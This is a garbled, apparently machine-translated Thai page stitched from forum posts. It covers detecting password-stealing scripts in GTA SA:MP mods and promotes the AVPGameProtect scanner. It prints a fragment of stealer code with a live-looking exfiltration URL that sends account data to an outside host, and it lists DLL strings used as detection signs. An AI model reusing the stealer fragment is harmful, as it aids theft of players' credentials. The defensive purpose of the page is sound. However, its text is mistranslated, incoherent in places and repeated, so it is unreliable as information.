ตรวจสอบไฟล์เพื่อหาตัวนิ่งทางออนไลน์ คู่มืออินเทอร์เน็ต - สิ่งที่น่าสนใจที่สุดบนอินเทอร์เน็ต ข้อมูลผลการค้นหา

เครื่องสแกนเครื่องแรกสุด ซึ่งปรากฏขึ้นในสมัยที่มีการพัฒนาอุปกรณ์จัดแต่งทรง ASI เครื่องแรก วันรุ่งขึ้นหลังจากการปรากฏตัวของสติลเลอร์ ฉันเริ่มพัฒนาเครื่องต่อต้านสตีลเลอร์ของตัวเอง

เครื่องสแกนประกอบด้วยโมดูลต่อไปนี้:
- เอ็นจิ้นที่เป็นเอกลักษณ์ของ YARA (ต้องขอบคุณทีมเขียนโปรแกรม Virustotal สำหรับเครื่องมืออันทรงพลังเช่นนี้)
- เอ็นจิ้นสคริปต์จาก Andreas Jonson (AngelScript) ความเร็ว ความง่ายในการฝัง และความสวยงามของสคริปต์ที่คล้ายกันในโปรเจ็กต์เดียว ต้องขอบคุณเขาที่คุณสามารถเปิด cryptors สำหรับ CLEO ได้อย่างรวดเร็วและในทางเทคนิค
- โปรแกรมจำลองโค้ด SCM ที่สามารถส่งเสริม cryptors ของ CLEO ได้ค่อนข้างดี (จากฉัน)

คุณสมบัติของโปรแกรม:
- ฐานข้อมูลผู้ขโมยค่อนข้างใหญ่ซึ่งมีการเติบโตมาตั้งแต่ประมาณปี 2014 เราได้รวบรวมม็อดที่เป็นอันตรายจำนวนหนึ่งจากไซต์ขนาดใหญ่และไม่ใหญ่มากหลายแห่ง
- ความสามารถในการสแกนโฟลเดอร์และไฟล์โดยการลากเข้าไปในหน้าต่างโปรแกรม
- บทสรุป ข้อมูลโดยย่อโอ มัลแวร์(พิมพ์ ชื่อเล่นของผู้พัฒนา และในฐานข้อมูลเวอร์ชันเก่า ชื่อเล่นของผู้จัดจำหน่าย)
- สแกน asi, dll, cleo, sf, cs และศักยภาพอื่น ๆ ไฟล์ที่เป็นอันตราย.
- การตรวจจับโค้ดที่เป็นอันตรายในไฟล์ที่มีนามสกุลที่เปลี่ยนแปลง ตัวอย่างเช่น เมื่อไม่นานมานี้ การเปลี่ยนชื่อผู้ขโมยเป็นไฟล์ txd และโหลดลงในเกมโดยใช้ตัวโหลด
- การคลายสคริปต์ CLEO ที่เข้ารหัสและการสแกนในภายหลัง (ควรสังเกตว่ามันจะถอดรหัสเฉพาะ cryptors ที่รู้จักและที่เราเจอ แต่ความจริงข้อนี้แก้ไขได้ง่ายเพียงเขียนถึงเราทางอีเมลและส่งไฟล์) เมื่อคุณสแกนสคริปต์ที่แยกออกมา คุณสามารถค้นหาแหล่งที่มาของสคริปต์หลังได้ในไฟล์ temp\decrypt.cs
- จำลองโค้ด SCM ได้ทันทีและถอดรหัสสคริปต์ ตามด้วยการตรวจสอบโค้ดที่เป็นอันตราย (หากตรวจพบโค้ดที่เป็นอันตราย โปรดดูดัมพ์ใน temp\decrypt.cs)
- อินเตอร์เฟซโปรแกรมที่เป็นมิตรและใช้งานง่าย
- ความเร็วสูงการสแกนเมื่อตรวจสอบไฟล์จำนวนมาก
- การดูไฟล์ที่พบในตัวในโหมดข้อความและโหมดฐานสิบหก

จุดสำคัญอย่างยิ่ง! ทุกคนควรอ่านเพื่อไม่ให้ถามคำถามโง่ ๆ
เครื่องสแกนได้รับการออกแบบ สำหรับการตรวจสอบการดัดแปลงเกมที่แตกออกจากไฟล์เก็บถาวรเท่านั้นในกรณีอื่น ๆ มันไม่มีประโยชน์!
เขายัง ไม่ได้มีเจตนาสำหรับตัวติดตั้งและผู้ติดตั้งอัตโนมัติ, msi, แพ็คเกจ exe, pif, mmbak, com, scr, vbs, bat, cmd, js และไฟล์ที่อาจเป็นอันตรายอื่น ๆ ที่ไม่พบใน mod เกม มีโปรแกรมป้องกันไวรัสสำหรับไฟล์เหล่านี้!
อีกด้วย คุณไม่ควรสแกนทั้งระบบมันไม่มีประโยชน์และไม่สมเหตุสมผล สแกนเนอร์นี้ได้รับการทดสอบ mod และมีไว้สำหรับ mod เท่านั้น คุณสามารถสแกนโฟลเดอร์เกมได้ แต่ที่นี่คุณต้องเข้าใจว่าเกมมีไฟล์ที่สามารถเข้าถึงอินเทอร์เน็ตได้และพร้อมที่จะเห็นในหน้าต่างสแกนเนอร์

ฉันอยากจะเตือนคุณทันทีว่า โปรแกรมนี้จะไม่ปกป้องบัญชีของคุณ 100% เช่นเดียวกับโปรแกรมป้องกันไวรัสหรือสแกนเนอร์อื่นๆ เมื่อพวกเขาเขียนบนหน้าปกของการป้องกันไวรัส 100% สำหรับฉันนี่เป็นสัญญาณให้ลบโปรแกรมป้องกันไวรัสออกจากดิสก์แล้ว แต่เครื่องสแกนนี้สามารถเร่งความเร็วในการตรวจสอบผู้ขโมยที่รู้จักอยู่แล้ว และช่วยให้คุณหลีกเลี่ยงการตกเป็นเหยื่อของผู้จัดจำหน่ายที่ไม่มีประสบการณ์
ที่สุด โปรแกรมป้องกันไวรัสที่ดีที่สุด- มันเป็นหัวของคุณและการตัดสินใจ - จะดาวน์โหลดหรือไม่ดาวน์โหลด ดาวน์โหลด mods จากไซต์ที่เชื่อถือได้เท่านั้นและที่ที่มีการตรวจสอบความปลอดภัยของไฟล์เก็บถาวร

ผู้เขียนโปรแกรมจะไม่รับผิดชอบต่อการตัดสินใจของคุณและผู้ขโมยที่อาจพลาดโดยเครื่องสแกน

บาง สัญลักษณ์โปรแกรม:

ความสนใจ! ตรวจพบไฟล์ที่สามารถสร้างการเชื่อมต่ออินเทอร์เน็ตได้ คุณควรพิจารณาก่อนติดตั้งในเกม แต่นี่อาจเป็นการอัปเดตสคริปต์อัตโนมัติด้วย นอกจากนี้ยังเป็นไปได้ที่จะมี URL ในไฟล์ ทุกอย่างขึ้นอยู่กับความสามารถในการตรวจสอบไฟล์ด้วยตนเอง
พบ CLEO styler ไฟล์ถูกคลายแพ็ก และคุณสามารถดูแหล่งที่มาได้
เครื่องสแกนพยายามแกะสคริปต์ แต่อาจไม่ทำงาน หรือไม่พบรหัสที่เป็นอันตราย ดูแหล่งที่มาในโฟลเดอร์ชั่วคราว ตรวจสอบให้แน่ใจว่าไฟล์ไม่ได้เข้ารหัส ที่นี่คุณต้องตรวจสอบสคริปต์ด้วยตนเอง
พบ CLEO stiller ในรูปแบบเปิด
พบไฟล์ที่ดาวน์โหลดมัลแวร์ลงในคอมพิวเตอร์ของคุณ
พบผู้ระงับจากโครงการฉาวโฉ่
พบการป้องกัน ไฟล์อาจเป็นภัยคุกคาม ที่นี่คุณเพียงแค่ต้องพึ่งพาความซื่อสัตย์และชื่อเสียงของผู้เขียน ถามผู้เขียนว่าเหตุใดไฟล์จึงถูกเข้ารหัส (ป้องกัน) แล้วคิดด้วยตัวเองเกี่ยวกับความเพียงพอของคำตอบ ไฟล์นี้อาจเป็นอันตรายได้
บางทีไฟล์อาจถูกบล็อกโดยแอปพลิเคชันอื่น หรือไฟล์มีขนาดเป็นศูนย์
ฉันไม่แนะนำให้ใส่ไฟล์ดังกล่าวลงในเกม ทุกสิ่งสามารถคาดหวังได้ที่นี่ นี่เป็นการรวมไฟล์หลายไฟล์เป็นไฟล์เดียว ในบรรดาไฟล์เหล่านี้อาจมีผู้ขโมยหรือมัลแวร์อื่นๆ อย่าไว้ใจกาว คุณสามารถมั่นใจได้ว่าการติดกาวนั้นปลอดภัยโดยการจัดเรียงเป็นไฟล์และตรวจสอบแต่ละไฟล์แยกกัน

เราขอให้คุณดาวน์โหลดโปรแกรมจากแหล่งที่เป็นทางการเท่านั้น นี่จะมากที่สุด ตัวเลือกที่ปลอดภัย.
กรุณาเขียนเกี่ยวกับข้อผิดพลาดใด ๆ ทางอีเมลหรือในกระทู้นี้

สำหรับการปกป้องบัญชีแบบไดนามิก เราขอแนะนำให้ใช้ปลั๊กอินพิเศษจาก DarkP1xel

ปลั๊กอินนี้จะบล็อกฟังก์ชันที่เป็นอันตรายในสคริปต์และม็อดอื่นๆ
หากคุณติดตั้งปลั๊กอินนี้ในเกม mod จะไม่สามารถส่งคำขอเว็บไปยังเซิร์ฟเวอร์บุคคลที่สามได้ ซึ่งหมายความว่ารหัสผ่าน samp ของคุณจะไม่ตกไปอยู่ในมือของคนผิด แม้ว่าคุณจะติดตั้งตัวขโมยใน เกม. ปลั๊กอินยังเก็บบันทึกโดยละเอียดของเหตุการณ์ที่น่าสงสัยทั้งหมดในเกม สำคัญ. ปลั๊กอินได้รับการอัปเดตอย่างต่อเนื่อง คอยติดตาม
ป.ล. อย่าลืมขอบคุณผู้เขียนสำหรับปลั๊กอิน;)

ขอบคุณทุกคนที่ช่วยเรา
ขอขอบคุณเป็นพิเศษสำหรับ Gedwadion, DarkP1xel คนเหล่านี้คือคนเจ๋งๆ ที่มีอนาคตด้านความปลอดภัยด้านไอที

ผู้เขียน:
Smalloff - การพัฒนาการสนับสนุนโครงการ
andre500 - การทดสอบ การสนับสนุนโครงการ
เว็บไซต์ของผู้เขียน (แหล่งข้อมูลอย่างเป็นทางการ):เว็บไซต์ Libertycity.ru
จดหมาย: Smalloff@site
ดาวน์โหลดโปรแกรม:AVPGameProtect18042019.rar
ปฏิบัติต่อผู้พัฒนาโปรแกรมด้วยเบียร์ (ขอบคุณล่วงหน้า):ยานเดกซ์ไม่มีการกรอง

(โปรดทราบ! การสนับสนุนโครงการสาธารณะถูกยกเลิกโดยสิ้นเชิง)

[เสียงจริงจังของ Chonishvili]:โดยไม่ต้องมีคำพูดมากมาย สกรูการแสดง ขณะที่ฉันกำลังเขียนข้อความนี้ กระดานข่าวและวิลล่าของคุณบน BB ได้ถูกรวมเข้ากับรัฐแล้ว และภาพจำลองได้ถูกถ่ายโอนไปยังผู้โจมตีแล้ว ฮ่าฮ่าฮ่าฮ่า ไอ ไอ ไอ ไอ *สำลัก*

คุณสามารถทำให้ตดของคุณเย็นลงได้ เพราะไฟล์คลีโอไม่ได้ถูกอัพโหลดขึ้นเว็บไซต์ แต่ไม่ได้หมายความว่าสิ่งเหล่านั้นจะถูกห้ามในโครงการ Samp-Rp อย่าสับสนนะ ไอ้บ้า!
ผู้ชื่นชอบการดัดแปลงทุกคนต่างคุ้นเคยกับแนวคิดของคำว่า “Stiller” (หรือที่รู้จักในชื่อ Keylogger แต่นั่นเป็นอีกเรื่องหนึ่ง) โดยปกติแล้วผู้นิ่งจะใส่พวกมันไว้ในคลีโอสคริปต์ซึ่งเราจะพูดถึงตอนนี้

คลีโอสคริปต์คืออะไร?

ฉันจะไม่อธิบายว่าสคริปต์คลีโอคืออะไร แนวคิดทั่วไปเรามามุ่งตรงสู่เกมออนไลน์กันดีกว่า Cleo-scripts สำหรับ SA:MP"a ได้รับการออกแบบมาเพื่อปรับปรุงความสะดวกสบายของเกม ขอบคุณพวกเขา คุณสามารถเปลี่ยนอินเทอร์เฟซให้เหมาะกับคุณได้ แก้ไขข้อบกพร่องต่างๆ การขัดข้อง ฯลฯ แต่ก็มี Cleo ที่เป็นอันตราย (หรือโกง) เช่นกัน -scripts (การโกง - การหลอกลวงจากภาษาอังกฤษ) ซึ่งโดยวิธีการนั้นเคร่งครัด สิ่งต้องห้ามในโครงการ Samp-Rp . สร้างขึ้นสำหรับเด็กที่ไม่พอใจในชีวิตและถูกทุบตีที่โรงเรียน คุณอดไม่ได้ที่จะแทรกวลี: “จิตก็เหมือนกับไวอากร้า สำหรับผู้ที่ทำด้วยตัวเองไม่ได้”
คลีโอสคริปต์ที่มีชื่อเสียงที่สุด ( .คสิงห์ สไฟล์ cript) - นี่คือตัวบ่งชี้ HP เป็นตัวเลข, เรดาร์สี่เหลี่ยม, สคริปต์ที่เพิ่ม FPS, ชุดเกราะและแถบสุขภาพรูปแบบต่างๆ (บางครั้งสิ่งเหล่านี้ไม่ได้เป็นเพียงแถบ แต่เป็นตัวละครที่คุณชื่นชอบเป็นต้น เอ$เอพี ร็อคกี้. เมื่อ HP ลดลง รูปถ่ายจะหายไปและเหลือเพียงภาพเงา)
หลายคนรู้สึกทรมานกับคำถามที่ว่า เหตุใดจึงไม่มีซีรีส์ enb บนไซต์ ความจริงก็คือว่า .asiรูปแบบนี้เป็นไฟล์ cleo เช่นกัน คอมไพล์เท่านั้น นั่นคือคุณสามารถเย็บเครื่องจัดแต่งทรงผมลงไปได้
คุณอาจสงสัยว่าทำไมฉันถึงเขียนหัวข้อถ้าไม่มีคลีโออยู่บนไซต์อยู่แล้ว แต่สิ่งนี้ไม่ได้อยู่ในไซต์ แต่อย่างน้อยคุณต้องมี StreamMemFix1.0 เพื่อบรรจุไว้ .asiและนี่เป็นเพียงหนึ่งในการแก้ไขมากมายสำหรับ GTA ซึ่งแฟน ๆ ทุกคนที่สูบ San ของเขาจะเต็มไปหมด โหมดแอนเดรียสเพื่อความจุและจึงทำขนมออกมา และฉันก็เงียบเกี่ยวกับ c-hud และการปรับเปลี่ยนอื่น ๆ แล้ว คุณรู้สึกเสียใจกับบัญชีนี้ไหม ถ้าอย่างนั้น หัวข้อนี้เหมาะสำหรับคุณ!

จะตรวจสอบไฟล์ .cs เพื่อหาอุปกรณ์จัดแต่งทรงได้อย่างไร

วิธีที่พบบ่อยที่สุดคือการตรวจสอบผ่านโปรแกรม ไวร์ชาร์ก. ทั้งหมดที่คุณต้องการ:

1. ดาวน์โหลดโปรแกรมเอง (คุณสามารถทำได้จากเว็บไซต์อย่างเป็นทางการ)
2. ชมวิดีโอนี้ ทุกอย่างมีการอธิบายอย่างชัดเจน

=====================================================================================================

วิธีที่สองในการตรวจสอบคลีโอสำหรับสติลเลอร์ ใน รุ่นล่าสุด cleo-libraries กำลังมา โปรแกรมเพิ่มเติมหนึ่งในนั้นเรียกว่า ซันนี่ บิลเดอร์- สิ่งที่เราต้องการ

0AB1: call_scm_func @stealer_by_mg 0 1@
:mg__steal__format_url
"http:" 2f 2f "candyquendy.hol.es " 2f "acci" 2f "add.php?" 00

candyquendy.hol.es - ไซต์ที่ส่งข้อมูลบัญชี
@stealer_by_mg 0 1@ เป็นผู้พัฒนาตัวขโมยเอง

=================================================================================================

นอกจากนี้ยังมีวิธีที่สามในการตรวจสอบไฟล์เพื่อหาผู้ขโมย มีสคริปต์ "steal_logger" .asi“เราจะใช้มันตรวจสอบ..
(ใช่ครับ เขาเองก็เป็นรูปแบบคลีโอ แต่ก็ไม่มีอะไรต้องกังวลถ้าไม่คิดจะเข้าฐานกับเขา) ฉันจะไม่ให้ลิงค์กับคุณ ค้นหามันบนอินเทอร์เน็ต
ฉันจะอธิบายวิธีการใช้งานโดยย่อ

1. วางไว้ในโฟลเดอร์เกม
2. ไปกันเถอะ ใดๆเซิร์ฟเวอร์ SA:MP ภายใต้ ใดๆไม่มีใคร
3. เราคิดรหัสผ่านเข้าสู่ระบบและปิดเกม
4. ควรสร้างไว้ในโฟลเดอร์ ไฟล์ข้อความ (.txtรูปแบบ). คลิกที่มันและในข้อความเราจะค้นหาบรรทัดที่มี IP ของเซิร์ฟเวอร์ของเราและรหัสผ่านสำหรับบัญชีที่ลงทะเบียนใหม่ พบ - หมายความว่าแฮกเกอร์มีข้อมูลนี้อยู่แล้ว ให้เขามีความสุขเมื่อเข้ามาเล่นกับแส้ และในเวลานี้ เรากำลังลบไฟล์คลีโอตัวสุดท้าย

[!] ใช้เป็นเช็ค เท่านั้นบัญชีที่สร้างขึ้นใหม่ อย่าเข้าสู่บัญชีหลักของคุณด้วยสคริปต์นี้ หลังจากตรวจสอบแล้ว ให้ลบ \ หรือทำสำเนา GTA แยกต่างหากเพื่อตรวจสอบสคริปต์ [!]

จะตรวจสอบไฟล์ .asi เพื่อหาผู้ขโมยได้อย่างไร

ส่วนที่ง่ายจบลงแล้ว ตอนนี้เรามาเรียนรู้ที่จะตรวจสอบ .asi-files เนื่องจาก styler ไม่เห็น Wireshark อยู่ในนั้น จะทำอย่างไร? ฉันจะโพสต์วิธีการที่รู้จักกันดีที่สุดสองสามวิธี

ที่สุด วิธีการที่มีประสิทธิภาพเช็ค การตรวจสอบผ่านโปรแกรม เครื่องมือวิเคราะห์ IEInspector HTTP.

===============================================================================================================

วิธีที่สองคือการตรวจสอบรหัสด้วยแผ่นจดบันทึก

1. กำลังเปิด .asiผ่านทางแผ่นจดบันทึก
2. มาดูโค้ดกัน

ตัวอย่างบริสุทธิ์เมื่อ (ไม่มีนิ่ง)

ตัวอย่างโค้ดด้วย สงบนิ่ง(ไม่ใช่ kernel.dll)

มาดูบรรทัดสุดท้ายกันดีกว่า

อีกทางเลือกหนึ่งสำหรับผู้ขโมยที่ซ่อนอยู่คือชื่อในข้อความ "urlmon.dll", "wininet.dl l", "wsock32.dll" ในโค้ดนั้นเอง หรือสาย" kernel32.dll ExitProcess user32.dll MessageBoxA ข้อผิดพลาดตัวโหลด wsprintfA"

========================================================================================================

"ฝ่ายบริหารไม่กู้คืนบัญชีที่สูญหาย"- พวกเขาพูดว่า.
"ความปลอดภัยของบัญชีอยู่ในมือคุณ". ฉันหวังว่าหลังจากอ่านหัวข้อนี้แล้ว “ยกมือขึ้น” ของคุณจะแข็งแกร่งขึ้น ดูแลบัญชีของคุณ

2015-2015 © รวบรวมจากฟอรั่มต่างๆ

AVPGameProtectเป็นโปรแกรมที่ช่วยท่านค้นหา ไฟล์ที่เป็นอันตรายในการปรับเปลี่ยนเกม คุณสมบัติหลักโปรแกรมที่ล้ำหน้าโปรแกรมป้องกันการขโมยอื่น ๆ - ความเป็นไปได้ของการสแกนจำนวนมากเช่น คุณสามารถสแกนไฟล์ใด ๆ ก็ได้และในปริมาณเท่าใดก็ได้เพียงแค่ถ่ายโอน ไฟล์ที่จำเป็นหรือโฟลเดอร์ที่มีไฟล์เข้าไปในหน้าต่างโปรแกรมแล้วรอผลการสแกน

คุณสมบัติของโปรแกรม:
- ฐานข้อมูลผู้ขโมยขนาดใหญ่ซึ่งได้รับการดูแลรักษามาตั้งแต่ปี 2014
- สแกน asi, dll, cleo, sf, cs และไฟล์ที่อาจเป็นอันตรายอื่น ๆ
- ความเร็วสูงเมื่อสแกนไฟล์จำนวนมาก
- แสดงข้อมูลเกี่ยวกับผู้ขโมยในหน้าต่างโปรแกรม (ประเภทผู้ขโมยหรือชื่อเล่นของผู้พัฒนา)
- การดูไฟล์ที่พบในโหมดข้อความและฐานสิบหกในตัว
- ค้นหาฟังก์ชันสำหรับการโต้ตอบกับอินเทอร์เน็ตหรือการดาวน์โหลดไฟล์
- การตรวจสอบสคริปต์ CLEO ว่ามีผู้ขโมยหรือไม่ (ไม่ใช่ทั้งหมด เฉพาะสคริปต์ที่มี cryptors ที่โปรแกรมรู้จักเท่านั้น) สคริปต์ที่ถอดรหัสจะปรากฏในโฟลเดอร์ temp ในโฟลเดอร์รูทของโปรแกรมภายใต้ชื่อ decrypt.cs
- ทรานสคริปต์ FuncCrypt จาก SR_Team และอื่น ๆ อีกมากมาย
- การสนับสนุนโปรแกรมอย่างต่อเนื่อง

สแกนเนอร์ไม่ได้มีไว้สำหรับการตรวจสอบตัวติดตั้งและบิลด์เกม หรือสำหรับการสแกนพีซีแบบเต็ม ในการสแกนคุณจะต้องแยกโฟลเดอร์หรือไฟล์ออกจากไฟล์เก็บถาวรแล้วลากเข้าไปในโปรแกรม

เป็นที่น่าสังเกตว่าโปรแกรมไม่ได้ปกป้องผู้ใช้ 100% เช่นเดียวกับผู้ต่อต้านการขโมยรายอื่น ๆ มีวัตถุประสงค์เพื่อระบุผู้ขโมยที่รู้จักเท่านั้น และการตัดสินใจเพิ่มเติมในการใช้สิ่งนี้หรือม็อดนั้นจะขึ้นอยู่กับคุณโดยตรง และผู้เขียนจะไม่รับผิดชอบต่อการตัดสินใจของคุณ โปรแกรมจะมีการปรับปรุงอย่างต่อเนื่อง

แบบแผนบางโปรแกรม:
InetLoader- ความสนใจ! ตรวจพบไฟล์ที่สามารถสร้างการเชื่อมต่ออินเทอร์เน็ตได้ คุณควรพิจารณาก่อนดาวน์โหลด แต่นี่อาจเป็นการอัปเดตสคริปต์อัตโนมัติด้วย
CLEO_Stealer - พบ CLEO styler ไฟล์ถูกคลายแพ็ก และคุณสามารถดูแหล่งที่มาได้
CLEO_Crypter - เครื่องสแกนพยายามแกะสคริปต์ บางทีอาจไม่ทำงาน หรือไม่พบโค้ดที่เป็นอันตราย ดูแหล่งที่มาในโฟลเดอร์ชั่วคราว
CLEO_Stealer- พบ CLEO stiller ในรูปแบบเปิด
Downloader_stealer- พบไฟล์ที่ดาวน์โหลดมัลแวร์ลงในคอมพิวเตอร์ของคุณ
Stealers_ru- พบผู้กลั่นกรองจากโครงการที่มีชื่อเสียง
อันตราย_VMProtect- พบการป้องกัน ไฟล์อาจเป็นภัยคุกคาม
สแกนไม่สำเร็จ - ไฟล์อาจถูกบล็อกโดยแอปพลิเคชันอื่น หรือไฟล์มีขนาดเป็นศูนย์
เข้าร่วมไฟล์- เครื่องสแกนพบว่าไฟล์หลายไฟล์ถูกรวมเป็นไฟล์เดียว ในบรรดาไฟล์เหล่านี้อาจมีผู้ขโมยหรือมัลแวร์อื่นๆ

จะหลีกเลี่ยงการชนคนขโมยได้อย่างไร!

Stealer เป็นสคริปต์ที่ติดตั้งโดยการคัดลอกไฟล์ที่มีโค้ดที่เป็นอันตรายลงในโฟลเดอร์ GTA หลังจากการติดตั้ง ทุกครั้งที่คุณเข้าสู่เซิร์ฟเวอร์เกม มันจะอ่านข้อมูลที่ป้อนทั้งหมดในกล่องโต้ตอบ (รหัสพิน รหัสผ่าน รหัสลับ ข้อมูล) และส่งไปยังผู้โจมตี ดังนั้น เพียงติดตั้งสคริปต์ในโฟลเดอร์ GTA หากคุณป้อนข้อมูลที่ถูกต้องลงในกล่องโต้ตอบ บัญชีเกมทั้งหมดของคุณก็จะสูญหายไป

บน ช่วงเวลานี้กรณีการขโมยบัญชีเกมบนเซิร์ฟเวอร์ Samp ต่างๆ มีบ่อยขึ้น ส่วนใหญ่มักจะเป็นเซิร์ฟเวอร์ที่มีโหมดสวมบทบาท เนื่องจากสกุลเงินของเกมมีมูลค่าในตัวเอง ผู้โจมตีสร้างรายได้จากความโง่เขลาของคุณ ในบทความนี้ฉันจะแสดงวิธีการที่ฉันรู้ให้คุณดู คุณรู้ไหมว่าคนที่ทำให้โจรเหล่านี้ดำเนินชีวิตตามหลักการ “ถ้าคุณไม่กิน คุณจะไม่มีชีวิตอยู่”

เคล็ดลับพื้นฐาน:

1. ใช้วิธีการทั้งหมดเสมอเพื่อปกป้องบัญชีที่คุณได้รับจากการบริหารโครงการที่คุณเล่น (รหัส PIN แบบกราฟิก การผูก SMS ฯลฯ ทั้งหมดขึ้นอยู่กับฟังก์ชันการทำงานของเซิร์ฟเวอร์)
2. ใช้รหัสผ่านที่ยาวที่สุดและมีโครงสร้างที่ซับซ้อน
3. อย่าเข้าสู่ระบบเซิร์ฟเวอร์ด้วยรหัสผ่านที่คุณใช้กับผู้อื่น
4. อย่าเปิดเผยข้อมูลบัญชีของคุณกับบุคคลที่คุณไม่แน่ใจ 100%
5. ฉันไม่แนะนำให้คุณใช้การแก้ไขแบบกำหนดเองต่างๆ ในเกม อาจมีไวรัสที่เข้ารหัส (Stiller) Stiller (จากภาษาอังกฤษเป็นขโมยเพื่อขโมย) เป็นโทรจันบางประเภท (มัลแวร์ไวรัส - สิ่งที่คุณต้องการ) ฟังก์ชันการทำงานประกอบด้วยการขโมยรหัสผ่านที่เก็บไว้ในระบบและส่งไปยัง "ผู้เขียน"
หลังจากที่คุณติดตั้ง mod ขโมยแล้วเมื่อเข้าสู่เกมคุณจะต้องป้อนรหัสผ่านและมันจะผ่านเข้าไปในมือของโจรได้สำเร็จ ส่วนใหญ่มักฝังอยู่ใน mods เช่น (Hood, การตั้งค่ากราฟิก และปลั๊กอิน Asi)
6. ใช้โปรแกรมป้องกันไวรัส! ไม่อนุญาตให้คุณส่งอีเมลหรือบัญชีของคุณที่บันทึกไว้ไปยังไซต์ที่ติดไวรัส (การป้องกันผู้คว้าและผู้ขโมย (exe))
7. การดูแลเซิร์ฟเวอร์ SA:MP จะไม่กู้คืนบัญชีที่ถูกแฮ็ก และจะไม่คืนเงินที่สูญหาย และจะไม่ขอรหัสผ่านบัญชีของคุณ

วิธีแรก.

ดังนั้นวิธีแรกจึงได้ผล 100%!!!
หากคุณไม่ดาวน์โหลด mods, cleo scripts, cheats ต่างๆ คุณจะไม่มีปัญหาใดๆ และไม่มีขโมย!

ตรวจสอบผ่านเว็บไซต์:

วิธีแรกจะป้องกันการแฮ็กทั้งหมด แต่ไม่เหมาะสำหรับทุกคน
ดังนั้นวิธีที่สองจึงเหมาะสำหรับผู้ที่ดาวน์โหลดสคริปต์ ม็อดต่างๆ ฮูด สูตรโกง และอื่นๆ ดังนั้นฉันจึงมีทางออกให้คุณ แต่มันจะไม่ปกป้องคุณ 100%! ไซต์ที่ตรวจสอบไฟล์ สคริปต์ต่างๆ, ที่นี่ . โดยการเยี่ยมชมเว็บไซต์คุณสามารถอ่าน "

ผู้ขโมยเวอร์ชันใหม่ล่าสุดอาจมีรูปแบบ .txd .dff .png .dat แต่เชื่อมต่อกันด้วยปลั๊กอิน .asi .cs .sf และจะไม่ทำงานหากไม่มีการเชื่อมต่อ ดังนั้น ให้ตรวจสอบปลั๊กอินและสคริปต์ทั้งหมดโดยใช้ตัวตรวจสอบของเรา หากคุณมีไฟล์ที่ซ่อนอยู่ใน GTA ให้ลบออก

จากนี้ เราสรุปได้ว่าตอนนี้ภาพนิ่งสามารถฝังภาพถ่ายปกติลงใน mods ได้ แม้ว่าจะอยู่ในไฟล์ .png ก็ตาม หลายคนบอกว่า

“คุณเป็นแกะหรืออะไรสักอย่าง ออกไปจากที่นี่! ฉันเล่น SA:MP มา 5 ปีแล้ว และฉันรู้ว่าพวกขโมยมาในรูปแบบ mods หรือ cleo เท่านั้น!”

ไม่มีผู้ชายอย่างที่เราเห็นแม้แต่ในภาพธรรมดาๆ weapon.png สมมติว่าฉันรู้บางทีอาจเป็นขโมย! เราตรวจสอบ mod ต่างๆ อยู่เสมอ คุณจะเชื่อใจใครบางคนได้อย่างไร ดังนั้น เมื่อเราตรวจสอบไฟล์เพื่อหาตัวนิ่ง ถ้ามันป็อปอัพขึ้นมา

ข้อมูลผลการค้นหา:

ไม่พบผู้ขโมย:

ในระหว่างการสแกนไฟล์ ไม่พบรหัสที่เป็นอันตรายหรือสิ่งใดที่น่าสงสัย ซึ่งหมายความว่าคุณไม่ต้องกังวลเกี่ยวกับบัญชีของคุณ เนื่องจากเครื่องมือตรวจสอบของเราใช้ทุกอย่าง วิธีการที่เป็นไปได้การตรวจจับโค้ดที่เป็นอันตรายในสคริปต์

คุณสมบัติของโปรแกรม:
- ฐานข้อมูลผู้ขโมยค่อนข้างใหญ่ซึ่งมีการเติบโตมาตั้งแต่ประมาณปี 2014 เราได้รวบรวมม็อดที่เป็นอันตรายจำนวนหนึ่งจากไซต์ขนาดใหญ่และไม่ใหญ่มากหลายแห่ง ขอขอบคุณเป็นพิเศษสำหรับเว็บไซต์ Gtavicecity.ru สำหรับตัวอย่างที่ให้มา
- ความสามารถในการสแกนโฟลเดอร์และไฟล์โดยการลากเข้าไปในหน้าต่างโปรแกรม
- แสดงข้อมูลโดยย่อเกี่ยวกับโปรแกรมที่เป็นอันตราย (ประเภท ชื่อเล่นของนักพัฒนา และในฐานข้อมูลผู้จัดจำหน่ายเวอร์ชันเก่า)
- สแกน asi, dll, cleo, sf, cs และไฟล์ที่อาจเป็นอันตรายอื่น ๆ
- การตรวจจับโค้ดที่เป็นอันตรายในไฟล์ที่มีนามสกุลที่เปลี่ยนแปลง ตัวอย่างเช่น เมื่อไม่นานมานี้ การเปลี่ยนชื่อผู้ขโมยเป็นไฟล์ txd และโหลดลงในเกมโดยใช้ตัวโหลด
- การคลายสคริปต์ CLEO ที่เข้ารหัสและการสแกนในภายหลัง (ควรสังเกตว่ามันจะถอดรหัสเฉพาะ cryptors ที่รู้จักและที่เราเจอ แต่ความจริงข้อนี้แก้ไขได้ง่ายเพียงเขียนถึงเราทางอีเมลและส่งไฟล์) เมื่อคุณสแกนสคริปต์ที่แยกออกมา คุณสามารถค้นหาแหล่งที่มาของสคริปต์หลังได้ในไฟล์ temp\decrypt.cs
- จำลองโค้ด SCM ได้ทันทีและถอดรหัสสคริปต์ ตามด้วยการตรวจสอบโค้ดที่เป็นอันตราย (หากตรวจพบโค้ดที่เป็นอันตราย โปรดดูดัมพ์ใน temp\decrypt.cs)
- อินเตอร์เฟซโปรแกรมที่เป็นมิตรและใช้งานง่าย
- แนวคิดของโปรแกรมค่อนข้างเรียบง่าย ซึ่งหมายความว่าสามารถอัปเดตได้ง่ายและบ่อยครั้ง
- ความเร็วในการสแกนสูงเมื่อสแกนไฟล์จำนวนมาก
- การดูไฟล์ที่พบในตัวในโหมดข้อความและโหมดฐานสิบหก

สแกนเนอร์มีจุดประสงค์เพื่อตรวจสอบการดัดแปลงเกมที่แตกออกจากไฟล์เก็บถาวรเท่านั้น ในกรณีอื่น ๆ ก็ไม่มีประโยชน์
ไม่ได้มีไว้สำหรับผู้ติดตั้งและผู้ติดตั้งอัตโนมัติ

ความสนใจ!!!
